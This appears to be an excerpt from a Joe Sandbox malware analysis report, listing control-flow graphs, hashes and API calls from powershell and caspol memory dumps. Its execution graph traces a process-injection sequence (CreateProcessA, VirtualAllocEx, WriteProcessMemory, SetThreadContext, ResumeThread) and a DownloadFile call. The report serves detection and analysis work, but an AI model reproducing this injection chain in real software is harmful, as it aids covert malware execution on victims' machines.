                                                                      • Instruction Fuzzy Hash: B6318F3191CA5C8FDB58DF5CD8857A9BBE1FBA9321F00822ED04ED3655CB70B8568B81

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.475431294.000007FE891A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE891A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7fe891a0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID: DownloadFile
                                                                      • String ID:
                                                                      • API String ID: 1407266417-0
                                                                      • Opcode ID: 3256bafd3350b19455e4fefda42f1c6bafc7e1ea39df54a6180ba360bd490e20
                                                                      • Instruction ID: c755f29a447ffd7eee11bbc952210359bd707e52e8eb64428b6e01456d9a3dd4
                                                                      • Opcode Fuzzy Hash: 3256bafd3350b19455e4fefda42f1c6bafc7e1ea39df54a6180ba360bd490e20
                                                                      • Instruction Fuzzy Hash: 2041133190DB889FDB19DB5898447AABFF0FB56321F04826FD08DD7162CB346846C781

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 26 7fe892726e9-7fe8927270a 27 7fe89272726-7fe89272799 26->27 28 7fe8927270c-7fe89272724 26->28 29 7fe89272c7d-7fe89272d36 27->29 30 7fe8927279f-7fe892727a9 27->30 28->27 31 7fe892727ab-7fe892727b8 30->31 32 7fe892727c2-7fe892727c9 30->32 31->32 34 7fe892727ba-7fe892727c0 31->34 35 7fe892727cb-7fe892727de 32->35 36 7fe892727e0 32->36 34->32 37 7fe892727e2-7fe892727e4 35->37 36->37 38 7fe89272bf8-7fe89272c02 37->38 39 7fe892727ea-7fe892727f6 37->39 43 7fe89272c04-7fe89272c14 38->43 44 7fe89272c15-7fe89272c25 38->44 39->29 42 7fe892727fc-7fe89272806 39->42 45 7fe89272808-7fe89272815 42->45 46 7fe89272822-7fe89272832 42->46 48 7fe89272c27-7fe89272c2b 44->48 49 7fe89272c32-7fe89272c7c 44->49 45->46 50 7fe89272817-7fe89272820 45->50 46->38 55 7fe89272838-7fe8927286c 46->55 48->49 50->46 55->38 60 7fe89272872-7fe8927287e 55->60 60->29 61 7fe89272884-7fe8927288e 60->61 62 7fe892728a7-7fe892728ac 61->62 63 7fe89272890-7fe8927289d 61->63 62->38 65 7fe892728b2-7fe892728b7 62->65 63->62 64 7fe8927289f-7fe892728a5 63->64 64->62 65->38 66 7fe892728bd-7fe892728c2 65->66 66->38 68 7fe892728c8-7fe892728d7 66->68 69 7fe892728e7 68->69 70 7fe892728d9-7fe892728e3 68->70 73 7fe892728ec-7fe892728f9 69->73 71 7fe89272903-7fe8927298e 70->71 72 7fe892728e5 70->72 80 7fe89272990-7fe8927299b 71->80 81 7fe892729a2-7fe892729c4 71->81 72->73 73->71 75 7fe892728fb-7fe89272901 73->75 75->71 80->81 82 7fe892729c6-7fe892729d0 81->82 83 7fe892729d4 81->83 84 7fe892729f0-7fe89272a7e 82->84 85 7fe892729d2 82->85 86 7fe892729d9-7fe892729e6 83->86 93 7fe89272a80-7fe89272a8b 84->93 94 7fe89272a92-7fe89272ab0 84->94 85->86 86->84 87 7fe892729e8-7fe892729ee 86->87 87->84 93->94 95 7fe89272ac0 94->95 96 7fe89272ab2-7fe89272abc 94->96 99 7fe89272ac5-7fe89272ad3 95->99 97 7fe89272add-7fe89272b6d 96->97 98 7fe89272abe 96->98 106 7fe89272b6f-7fe89272b7a 97->106 107 7fe89272b81-7fe89272bda 97->107 98->99 99->97 100 7fe89272ad5-7fe89272adb 99->100 100->97 106->107 110 7fe89272be2-7fe89272bf7 107->110
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.475626527.000007FE89270000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89270000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7fe89270000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0d46b230baad3e9d7e278be51a8a8da29d2b2eb72adc0c7add9055ac0f3fb555
                                                                      • Instruction ID: 6e211525aa625fc491f685bb2c07a48364a459d49ca25601d2371e88477f41e3
                                                                      • Opcode Fuzzy Hash: 0d46b230baad3e9d7e278be51a8a8da29d2b2eb72adc0c7add9055ac0f3fb555
                                                                      • Instruction Fuzzy Hash: E922063090CB894FE75ADB2C94507797BE2FF9A344F2401AED48ED72A3DA24AC56C741

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 111 7fe89270f0d-7fe89270f42 113 7fe89270f5e-7fe89270f96 111->113 114 7fe89270f44-7fe89270f5c 111->114 115 7fe89271098-7fe892710c8 113->115 116 7fe89270f9c-7fe89270fa6 113->116 114->113 124 7fe8927110a-7fe89271124 115->124 125 7fe892710ca-7fe892710dc 115->125 117 7fe89270fa8-7fe89270fb5 116->117 118 7fe89270fbf-7fe89270fee 116->118 117->118 120 7fe89270fb7-7fe89270fbd 117->120 118->115 131 7fe89270ff4-7fe89270ffe 118->131 120->118 129 7fe8927112a-7fe8927119e 124->129 130 7fe892711c1-7fe892711cb 124->130 127 7fe892710ed-7fe89271108 125->127 128 7fe892710de-7fe892710ea 125->128 127->124 128->127 149 7fe892711a6-7fe892711be 129->149 132 7fe892711d8-7fe892711e8 130->132 133 7fe892711cd-7fe892711d7 130->133 134 7fe89271017-7fe89271077 131->134 135 7fe89271000-7fe8927100d 131->135 136 7fe892711ea-7fe892711ee 132->136 137 7fe892711f5-7fe8927121a 132->137 146 7fe89271079-7fe89271084 134->146 147 7fe8927108b-7fe89271097 134->147 135->134 139 7fe8927100f-7fe89271015 135->139 136->137 139->134 146->147 149->130
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.475626527.000007FE89270000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89270000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7fe89270000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f97dbf291516746ce1a5288c1a7c6b0f0b05bf4a6bb441d0f22d3ec93f6cdcdb
                                                                      • Instruction ID: 121c73ebc0423fdaedf3bfbab35958b86fd17d8ee5437cfcce11cb1aa89245a0
                                                                      • Opcode Fuzzy Hash: f97dbf291516746ce1a5288c1a7c6b0f0b05bf4a6bb441d0f22d3ec93f6cdcdb
                                                                      • Instruction Fuzzy Hash: E1A1BF21A0EBCA0FE347973858647617FE1EF97254B1901EBD48DCB1B3D6189C5AC362
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.475626527.000007FE89270000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89270000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7fe89270000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7805957e58b4a07f57a139038f1fd39241f7b59bbdf04c9c3560f2d0ca48cfa9
                                                                      • Instruction ID: 520f1e10a1cc999815b7e8587e8ac89896fa4c171fd6c046fd14efca6f43186f
                                                                      • Opcode Fuzzy Hash: 7805957e58b4a07f57a139038f1fd39241f7b59bbdf04c9c3560f2d0ca48cfa9
                                                                      • Instruction Fuzzy Hash: F092F43190D7CA5FF31AA738A8112B97FE1EF87254F1901EFD48AD71A3D618681AC352
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.475626527.000007FE89270000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89270000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7fe89270000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dbd1e7d5ca98851ffc8faf9010d8d71111460f4edaa451f674efd5c8c3d3f69b
                                                                      • Instruction ID: 281f99f406f91c353f896bbe831b4318401aea875869bfb58f35eb644f1603af
                                                                      • Opcode Fuzzy Hash: dbd1e7d5ca98851ffc8faf9010d8d71111460f4edaa451f674efd5c8c3d3f69b
                                                                      • Instruction Fuzzy Hash: 75218801A4EBD50FE703933868A42A17FA1AF87124B0E00D7D489CF1F3D80C5D2AD3A2

                                                                      Execution Graph

                                                                      Execution Coverage:15.5%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:161
                                                                      Total number of Limit Nodes:8
                                                                      execution_graph 11766 38e9fe 11768 38e7fc 11766->11768 11767 38e918 11768->11767 11772 e31040 11768->11772 11789 e310a6 11768->11789 11807 e31030 11768->11807 11773 e3105a 11772->11773 11824 e315a2 11773->11824 11832 e31ae3 11773->11832 11837 e3141c 11773->11837 11842 e31a1a 11773->11842 11848 e3163b 11773->11848 11852 e3181b 11773->11852 11864 e316d0 11773->11864 11875 e3190c 11773->11875 11880 e3188c 11773->11880 11885 e313ec 11773->11885 11890 e3154f 11773->11890 11895 e3168a 11773->11895 11903 e31444 11773->11903 11910 e315c6 11773->11910 11774 e31062 11774->11768 11790 e31034 11789->11790 11792 e310a9 11789->11792 11793 e31ae3 2 API calls 11790->11793 11794 e315a2 4 API calls 11790->11794 11795 e315c6 2 API calls 11790->11795 11796 e31444 2 API calls 11790->11796 11797 e3168a 4 API calls 11790->11797 11798 e3154f 2 API calls 11790->11798 11799 e313ec 2 API calls 11790->11799 11800 e3188c 2 API calls 11790->11800 11801 e3190c 2 API calls 11790->11801 11802 e316d0 6 API calls 11790->11802 11803 e3181b 6 API calls 11790->11803 11804 e3163b 2 API calls 11790->11804 11805 e31a1a 2 API calls 11790->11805 11806 e3141c 2 API calls 11790->11806 11791 e31062 11791->11768 11792->11768 11793->11791 11794->11791 11795->11791 11796->11791 11797->11791 11798->11791 11799->11791 11800->11791 11801->11791 11802->11791 11803->11791 11804->11791 11805->11791 11806->11791 11808 e31034 11807->11808 11810 e31ae3 2 API calls 11808->11810 11811 e315a2 4 API calls 11808->11811 11812 e315c6 2 API calls 11808->11812 11813 e31444 2 API calls 11808->11813 11814 e3168a 4 API calls 11808->11814 11815 e3154f 2 API calls 11808->11815 11816 e313ec 2 API calls 11808->11816 11817 e3188c 2 API calls 11808->11817 11818 e3190c 2 API calls 11808->11818 11819 e316d0 6 API calls 11808->11819 11820 e3181b 6 API calls 11808->11820 11821 e3163b 2 API calls 11808->11821 11822 e31a1a 2 API calls 11808->11822 11823 e3141c 2 API calls 11808->11823 11809 e31062 11809->11768 11810->11809 11811->11809 11812->11809 11813->11809 11814->11809 11815->11809 11816->11809 11817->11809 11818->11809 11819->11809 11820->11809 11821->11809 11822->11809 11823->11809 11825 e315ae 11824->11825 11826 e318c3 11825->11826 11915 38d8a8 11825->11915 11919 38d8a1 11825->11919 11923 38d7b8 11826->11923 11927 38d7b1 11826->11927 11827 e3177f 11827->11774 11833 e31afd 11832->11833 11931 38de09 11833->11931 11935 38de10 11833->11935 11834 e31f4b 11838 e31422 11837->11838 11939 38e2d0 11838->11939 11943 38e2c5 11838->11943 11844 e319af 11842->11844 11843 e31e72 11843->11774 11844->11843 11846 38d7b8 ResumeThread 11844->11846 11847 38d7b1 ResumeThread 11844->11847 11845 e3177f 11845->11774 11846->11845 11847->11845 11947 38df38 11848->11947 11951 38df31 11848->11951 11849 e3166b 11849->11774 11853 e31824 11852->11853 11955 38e098 11853->11955 11959 38e090 11853->11959 11854 e31bec 11854->11774 11855 e315ae 11855->11854 11856 e318c3 11855->11856 11862 38d8a8 Wow64SetThreadContext 11855->11862 11863 38d8a1 Wow64SetThreadContext 11855->11863 11858 38d7b8 ResumeThread 11856->11858 11859 38d7b1 ResumeThread 11856->11859 11857 e3177f 11857->11774 11858->11857 11859->11857 11862->11855 11863->11855 11873 38df38 WriteProcessMemory 11864->11873 11874 38df31 WriteProcessMemory 11864->11874 11865 e3173b 11865->11774 11866 e315ae 11866->11865 11867 e318c3 11866->11867 11871 38d8a8 Wow64SetThreadContext 11866->11871 11872 38d8a1 Wow64SetThreadContext 11866->11872 11869 38d7b8 ResumeThread 11867->11869 11870 38d7b1 ResumeThread 11867->11870 11868 e3177f 11868->11774 11869->11868 11870->11868 11871->11866 11872->11866 11873->11866 11874->11866 11876 e31929 11875->11876 11878 38df38 WriteProcessMemory 11876->11878 11879 38df31 WriteProcessMemory 11876->11879 11877 e31eca 11878->11877 11879->11877 11881 e31891 11880->11881 11883 38d7b8 ResumeThread 11881->11883 11884 38d7b1 ResumeThread 11881->11884 11882 e3177f 11882->11774 11883->11882 11884->11882 11886 e313ef 11885->11886 11888 38e2d0 CreateProcessA 11886->11888 11889 38e2c5 CreateProcessA 11886->11889 11887 e31583 11887->11887 11888->11887 11889->11887 11891 e31555 11890->11891 11892 e31583 11891->11892 11893 38e2d0 CreateProcessA 11891->11893 11894 38e2c5 CreateProcessA 11891->11894 11892->11892 11893->11892 11894->11892 11896 e315ae 11895->11896 11897 e318c3 11896->11897 11901 38d8a8 Wow64SetThreadContext 11896->11901 11902 38d8a1 Wow64SetThreadContext 11896->11902 11899 38d7b8 ResumeThread 11897->11899 11900 38d7b1 ResumeThread 11897->11900 11898 e3177f 11898->11774 11899->11898 11900->11898 11901->11896 11902->11896 11904 e3143c 11903->11904 11906 e31428 11903->11906 11904->11774 11905 e31583 11905->11905 11907 e31501 11906->11907 11908 38e2d0 CreateProcessA 11906->11908 11909 38e2c5 CreateProcessA 11906->11909 11907->11774 11908->11905 11909->11905 11911 e315cf 11910->11911 11913 38de09 VirtualAllocEx 11911->11913 11914 38de10 VirtualAllocEx 11911->11914 11912 e31f4b 11913->11912 11914->11912 11916 38d8f1 Wow64SetThreadContext 11915->11916 11918 38d96f 11916->11918 11918->11825 11920 38d8f1 Wow64SetThreadContext 11919->11920 11922 38d96f 11920->11922 11922->11825 11924 38d7fc ResumeThread 11923->11924 11926 38d84e 11924->11926 11926->11827 11928 38d7fc ResumeThread 11927->11928 11930 38d84e 11928->11930 11930->11827 11932 38de54 VirtualAllocEx 11931->11932 11934 38ded2 11932->11934 11934->11834 11936 38de54 VirtualAllocEx 11935->11936 11938 38ded2 11936->11938 11938->11834 11940 38e357 CreateProcessA 11939->11940 11942 38e5b5 11940->11942 11944 38e357 CreateProcessA 11943->11944 11946 38e5b5 11944->11946 11948 38df84 WriteProcessMemory 11947->11948 11950 38e023 11948->11950 11950->11849 11952 38df84 WriteProcessMemory 11951->11952 11954 38e023 11952->11954 11954->11849 11956 38e0e4 ReadProcessMemory 11955->11956 11958 38e162 11956->11958 11958->11855 11960 38e0e4 ReadProcessMemory 11959->11960 11962 38e162 11960->11962 11962->11855 11975 38e947 11977 38e7fc 11975->11977 11976 38e918 11977->11976 11978 e31040 12 API calls 11977->11978 11979 e31030 12 API calls 11977->11979 11980 e310a6 12 API calls 11977->11980 11978->11977 11979->11977 11980->11977

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 792 e310a6-e310a7 793 e31034-e31058 792->793 794 e310a9-e310c5 792->794 795 e3105a 793->795 796 e3105f-e3107e 793->796 797 e310c7 794->797 798 e310cc-e3128e 794->798 795->796 817 e31081 call e31ae3 796->817 818 e31081 call e315a2 796->818 819 e31081 call e315c6 796->819 820 e31081 call e31444 796->820 821 e31081 call e3168a 796->821 822 e31081 call e3154f 796->822 823 e31081 call e313ec 796->823 824 e31081 call e3188c 796->824 825 e31081 call e3190c 796->825 826 e31081 call e316d0 796->826 827 e31081 call e3181b 796->827 828 e31081 call e3163b 796->828 829 e31081 call e31a1a 796->829 830 e31081 call e3141c 796->830 797->798 811 e31290-e31299 798->811 812 e312af 798->812 804 e31087-e31088 813 e312a0-e312a3 811->813 814 e3129b-e3129e 811->814 815 e312b2-e312b6 812->815 816 e312ad 813->816 814->816 816->815 817->804 818->804 819->804 820->804 821->804 822->804 823->804 824->804 825->804 826->804 827->804 828->804 829->804 830->804
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4,p$$p$$p
                                                                      • API String ID: 0-3634262024
                                                                      • Opcode ID: 23316e87c331fe002e2e71a9e0c288703bfc01fa41966e71965d0861ef8c7ae4
                                                                      • Instruction ID: 437f7224c14b28d1fb8c4dc026fb59ebd4d13b90e0d23ded465a3d62620c9285
                                                                      • Opcode Fuzzy Hash: 23316e87c331fe002e2e71a9e0c288703bfc01fa41966e71965d0861ef8c7ae4
                                                                      • Instruction Fuzzy Hash: E9410370D04208DFDB08DFA9D8587EEBFB2BF89300F2091AAD015AB2A5DB741941DF84

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 831 38e2c5-38e369 833 38e36b-38e382 831->833 834 38e3b2-38e3da 831->834 833->834 837 38e384-38e389 833->837 838 38e3dc-38e3f0 834->838 839 38e420-38e476 834->839 840 38e38b-38e395 837->840 841 38e3ac-38e3af 837->841 838->839 846 38e3f2-38e3f7 838->846 848 38e478-38e48c 839->848 849 38e4bc-38e5b3 CreateProcessA 839->849 842 38e399-38e3a8 840->842 843 38e397 840->843 841->834 842->842 847 38e3aa 842->847 843->842 850 38e3f9-38e403 846->850 851 38e41a-38e41d 846->851 847->841 848->849 857 38e48e-38e493 848->857 867 38e5bc-38e6a1 849->867 868 38e5b5-38e5bb 849->868 852 38e405 850->852 853 38e407-38e416 850->853 851->839 852->853 853->853 856 38e418 853->856 856->851 859 38e495-38e49f 857->859 860 38e4b6-38e4b9 857->860 861 38e4a1 859->861 862 38e4a3-38e4b2 859->862 860->849 861->862 862->862 863 38e4b4 862->863 863->860 880 38e6b1-38e6b5 867->880 881 38e6a3-38e6a7 867->881 868->867 883 38e6c5-38e6c9 880->883 884 38e6b7-38e6bb 880->884 881->880 882 38e6a9 881->882 882->880 886 38e6d9-38e6dd 883->886 887 38e6cb-38e6cf 883->887 884->883 885 38e6bd 884->885 885->883 888 38e6df-38e708 886->888 889 38e713-38e71e 886->889 887->886 890 38e6d1 887->890 888->889 894 38e71f 889->894 890->886 894->894
                                                                      APIs
                                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0038E597
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.468692237.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_380000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 51634b39b0ff80be0bd0c76116776228f8349abcd9a6b9cff732597c492fca72
                                                                      • Instruction ID: 47e367f176d176e1f8e40a740b8ac36597daea846bfc53d6cded6d26df568724
                                                                      • Opcode Fuzzy Hash: 51634b39b0ff80be0bd0c76116776228f8349abcd9a6b9cff732597c492fca72
                                                                      • Instruction Fuzzy Hash: 8FC13770D002198FDF25DFA8C845BEEBBB1BF49304F0095AAD819B7290DB749A85CF95

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 895 38e2d0-38e369 897 38e36b-38e382 895->897 898 38e3b2-38e3da 895->898 897->898 901 38e384-38e389 897->901 902 38e3dc-38e3f0 898->902 903 38e420-38e476 898->903 904 38e38b-38e395 901->904 905 38e3ac-38e3af 901->905 902->903 910 38e3f2-38e3f7 902->910 912 38e478-38e48c 903->912 913 38e4bc-38e5b3 CreateProcessA 903->913 906 38e399-38e3a8 904->906 907 38e397 904->907 905->898 906->906 911 38e3aa 906->911 907->906 914 38e3f9-38e403 910->914 915 38e41a-38e41d 910->915 911->905 912->913 921 38e48e-38e493 912->921 931 38e5bc-38e6a1 913->931 932 38e5b5-38e5bb 913->932 916 38e405 914->916 917 38e407-38e416 914->917 915->903 916->917 917->917 920 38e418 917->920 920->915 923 38e495-38e49f 921->923 924 38e4b6-38e4b9 921->924 925 38e4a1 923->925 926 38e4a3-38e4b2 923->926 924->913 925->926 926->926 927 38e4b4 926->927 927->924 944 38e6b1-38e6b5 931->944 945 38e6a3-38e6a7 931->945 932->931 947 38e6c5-38e6c9 944->947 948 38e6b7-38e6bb 944->948 945->944 946 38e6a9 945->946 946->944 950 38e6d9-38e6dd 947->950 951 38e6cb-38e6cf 947->951 948->947 949 38e6bd 948->949 949->947 952 38e6df-38e708 950->952 953 38e713-38e71e 950->953 951->950 954 38e6d1 951->954 952->953 958 38e71f 953->958 954->950 958->958
                                                                      APIs
                                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0038E597
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.468692237.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_380000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 7ae855911e1277527fc01cd245986d3cc581a5d77dd91d83e4397acd4f61b71d
                                                                      • Instruction ID: 5c4e6de747d24dc470acac41df273fadcd752d8021a52789deda8a35f5a72943
                                                                      • Opcode Fuzzy Hash: 7ae855911e1277527fc01cd245986d3cc581a5d77dd91d83e4397acd4f61b71d
                                                                      • Instruction Fuzzy Hash: 47C13770D002198FDF25DFA8C845BEEBBB1BF49304F0095AAD819B7290DB749A85CF95

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 959 38df31-38dfa3 961 38dfba-38e021 WriteProcessMemory 959->961 962 38dfa5-38dfb7 959->962 964 38e02a-38e07c 961->964 965 38e023-38e029 961->965 962->961 965->964
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0038E00B
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.468692237.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_380000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: 85283234250803a864cbf8f408f2d64aa2ed9a2164fac6e6d8b40e3c2422baca
                                                                      • Instruction ID: ffcee859201791522e53468664f5aed78a6e947f8de1f02e21f1ff0a3eaa9019
                                                                      • Opcode Fuzzy Hash: 85283234250803a864cbf8f408f2d64aa2ed9a2164fac6e6d8b40e3c2422baca
                                                                      • Instruction Fuzzy Hash: 024198B4D012489FCF10CFA9D984AEEFBF1AB49314F24942AE815B7250D375AA45CF64

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 970 38df38-38dfa3 972 38dfba-38e021 WriteProcessMemory 970->972 973 38dfa5-38dfb7 970->973 975 38e02a-38e07c 972->975 976 38e023-38e029 972->976 973->972 976->975
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0038E00B
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.468692237.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_380000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: c7cd2df449152b3f3895aba81fd0bdd19973f4fe81cee8e710977cf876f7551d
                                                                      • Instruction ID: 48ac77a1f44e0d93ab0655da4d2528bf103366499d1b50982e90ea6959161cf1
                                                                      • Opcode Fuzzy Hash: c7cd2df449152b3f3895aba81fd0bdd19973f4fe81cee8e710977cf876f7551d
                                                                      • Instruction Fuzzy Hash: D441A9B4D002489FCF00CFAAD984AEEFBF1BB49314F24942AE815B7250D375AA45CF64

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 981 38e090-38e160 ReadProcessMemory 984 38e169-38e1bb 981->984 985 38e162-38e168 981->985 985->984
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0038E14A
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.468692237.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_380000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: 552ec85157fd54966f24bd3193509683270288495d2165b7232bcd303bfc7b8f
                                                                      • Instruction ID: 1dbf546a6930c165651208d0a490502fd8372bb51f477f944083ff248ce5e81f
                                                                      • Opcode Fuzzy Hash: 552ec85157fd54966f24bd3193509683270288495d2165b7232bcd303bfc7b8f
                                                                      • Instruction Fuzzy Hash: C641A8B9D002589FCF10CFA9D984AEEFBB1BB49314F24942AE815B7350C734AA45CF64

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 990 38e098-38e160 ReadProcessMemory 993 38e169-38e1bb 990->993 994 38e162-38e168 990->994 994->993
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0038E14A
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.468692237.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_380000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: 8d7815b07efac4e3217518f0422e3272688b0b1c41bf47e8d2ef22c20b1826e0
                                                                      • Instruction ID: 9fb84959db46924984b6894cac2fab1c00cd87a8038ba1f4cf78511e673af677
                                                                      • Opcode Fuzzy Hash: 8d7815b07efac4e3217518f0422e3272688b0b1c41bf47e8d2ef22c20b1826e0
                                                                      • Instruction Fuzzy Hash: CF41AAB9D002589FCF10CFA9D984AEEFBB1BF49314F24942AE815B7210D735A945CF64

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 999 38de09-38ded0 VirtualAllocEx 1002 38ded9-38df23 999->1002 1003 38ded2-38ded8 999->1003 1003->1002
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0038DEBA
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.468692237.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_380000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 5f4a1d724b8d3feaf18afe2774db7beff90d6d31332e1112b5030cfabe618203
                                                                      • Instruction ID: 58174448eb001c44be6279c0e6724520e09d3c190856ba8d57f656fbbd18bb29
                                                                      • Opcode Fuzzy Hash: 5f4a1d724b8d3feaf18afe2774db7beff90d6d31332e1112b5030cfabe618203
                                                                      • Instruction Fuzzy Hash: A74198B8D002489FCF10CFA9D984AEEBBB1AF59314F24942AE815BB354D735A906CF54

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1008 38de10-38ded0 VirtualAllocEx 1011 38ded9-38df23 1008->1011 1012 38ded2-38ded8 1008->1012 1012->1011
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0038DEBA
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.468692237.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_380000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 74e958968a0e1339930662e37f6a6d6e4cc2ed66d00d42218030b99747666a00
                                                                      • Instruction ID: 0cb6a8a47073644505d07b69338d2e24c64e48bc0c81569694712221e7dbbc20
                                                                      • Opcode Fuzzy Hash: 74e958968a0e1339930662e37f6a6d6e4cc2ed66d00d42218030b99747666a00
                                                                      • Instruction Fuzzy Hash: DB41A9B8D002489BCF10CFA9D984AAEFBB1BB49310F10942AE815BB314D735A905CFA4

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1017 38d8a1-38d908 1019 38d90a-38d91c 1017->1019 1020 38d91f-38d96d Wow64SetThreadContext 1017->1020 1019->1020 1022 38d96f-38d975 1020->1022 1023 38d976-38d9c2 1020->1023 1022->1023
                                                                      APIs
                                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0038D957
                                                                      Memory Dump Source
